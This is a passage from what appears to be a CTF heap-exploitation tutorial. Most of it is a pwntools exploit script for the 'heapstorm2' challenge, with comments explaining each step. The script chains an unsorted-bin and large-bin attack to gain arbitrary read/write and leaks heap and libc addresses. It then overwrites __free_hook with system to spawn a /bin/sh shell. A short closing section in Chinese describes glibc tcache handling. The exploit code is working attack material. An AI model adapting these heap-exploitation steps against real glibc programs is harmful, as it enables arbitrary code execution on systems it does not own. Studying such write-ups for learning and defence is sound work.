sl(str(index))
p.recvuntil('Size: ')
sl(str(size))
p.recvuntil('Content: ',timeout=1)
sl(content)

def free(index):
p.recvuntil('Command: ')
sl("3")
p.recvuntil('Index: ')
sl(str(index))

def view(index):
p.recvuntil('Command: ')
sl("4")
p.recvuntil('Index: ')
sl(str(index))
p.recvuntil('Chunk[1]: ')
return p.recv()

base = 0x13370800
while True:
p = process('./heapstorm2')
add(0x18) #0
add(0x508) #1
add(0x18) #2
add(0x18) #3
add(0x508) #4
add(0x18) #5
add(0x18) #6

# the purpose of this line is unclear; perhaps it just eases debugging a little.
# the point: during malloc the next chunk's prev_size field is only written, never read back and checked.
# edit(1,(0x4f0+8),b'A'*(0x4f0)+p64(0x500))
free(1)
edit(0,(0x18-12),b'A'*(0x18-12))
add(0x18) #1
add(0x4d8) #7 to be overlapped by 1
free(1)
free(2)
#occupy original position of chunk 1 2, now heap is full without free chunk
# we can use 7 to control 2.
# chunk 2 header is in chunk7 of (user_pointer+0x10),
# that is the reason of line91's double qword
add(0x30) #1
add(0x4e8) #2

free(4)
edit(3,(0x18-12),b'B'*(0x18-12))
add(0x18) #4
add(0x4d8) #8 to be overlapped by 4
free(4)
free(5)
add(0x40) #4

# move 0x4e0 from unsorted bin to large bin through free and remalloc 2.
# now we can use 8 to control freed 0x4e0
# this can be used in largebin attack.
free(2)
add(0x4e8)
free(2)

#when taking a chunk out of the unsorted bin, the traversal goes right to left, and for the
#rightmost chunk, chunk->bk->fd = unsorted_chunks(av), i.e. the unsorted bin head. Here the effect
#is that the chunk's bk's fd (that is, base-0x20+0x10) gets assigned, again with no validity check --
#otherwise we would get a segmentation fault.
#obviously we don't know the bin's head node, so we cannot keep walking this list forever; but the
#request is a 0x50 chunk, an exact fit that is taken out immediately. The fake chunk works.
payload1 = 2*p64(0x0)+p64(0)+p64(0x4f1)+p64(0)+p64(base-0x20)
edit(7,len(payload1),payload1)

payload2 = 4*p64(0)+p64(0)+p64(0x4e1)+p64(0)+p64(base-0x20+8)+p64(0)+p64(base-0x20-0x18-5)
edit(8,len(payload2),payload2)

try:
try:
#0x48 to chunksize is 0x50, which is same as 0x56 no_mask version
# gdb.attach(p)
add(0x48) #2
p.clean()
sl(b'what?')
log.success("success")
break

except EOFError:
# otherwise crash and try again
# why would crash happen? because the check after calloc call _int_malloc
# which is `assert( !mem || chunk_is_mmap(mem2chunk(mem)) || av == arena_for_chunk(mem2chunk(mem)) )`
# if the IS_MMAPED flag is not true, then the assertion will fail.
# so continuous testing for a most significant half byte of heap address is IS_MMAPED on.
log.info("error")
p.close()
continue
except BrokenPipeError:
log.info("error")
continue
#0x133707e0: 0x2b863cd060000000 0x0000000000000056
#0x133707f0: 0x00007f36a1fc1b58 0x0000562b863cd060
#0x13370800: 0x956bc5b57f846f56 0xfd29773a11768444
# clear out value used to xor decryption. and set condition to pass check in `view`
# @base is random read/write target address.
# the left xored size of chunk0 is large enough.
p1 = p64(0)*5+p64(0x13377331)+p64(base+0x30)
edit(2,len(p1),p1)

# read out some heap address
# p2 = p64(0)*3+p64(0x13377331)+p64(base)+p64(0x100)+p64(base-0x20+3)+p64(8)
p2 = p64(base-0x20+3)+p64(8)
edit(0,len(p2),p2)
heap = u64(view(1)[0:8])
log.success("heap address is : "+hex(heap))

p3 = p64(heap+0x10)+p64(8)
edit(0,len(p3),p3)
unsort_bin = u64(view(1)[0:8])
libc_base = unsort_bin - 0x3c1b58
log.success("unsort bin is : " + hex(unsort_bin))
log.success("libc address is : " + hex(libc_base))

system = libc_base + elf.symbols['system']
free = libc_base + elf.symbols['__free_hook']
log.success("free address is : "+hex(free))
log.success("system address is : "+hex(system))

p4 = p64(free)+p64(0x100)+p64(base+0x50)+p64(0x100)+b'/bin/sh\0'
edit(0,len(p4),p4)
edit(1,8,p64(system))

p.recvuntil('Command: ')
sl("3")
p.recvuntil('Index: ')
sl('2')

p.interactive()

Tcache attack

  • 内存释放:
    • 在 free 函数的最先处理部分,首先是检查释放块是否页对齐及前后堆块的释放情况,便优先放入 tcache 结构中。
  • 内存申请:
    • 首先,申请的内存块符合 fastbin 大小时并且在 fastbin 内找到可用的空闲块时,会把该 fastbin 链上的其他内存块放入 tcache 中。
    • 其次,申请的内存块符合 smallbin 大小时并且在 smallbin 内找到可用的空闲块时,会把该 smallbin 链上的其他内存块放入 tcache 中。
    • 当在 unsorted bin 链上循环处理时,当找到大小合适的链时,并不直接返回,而是先放到 tcache 中,继续处理。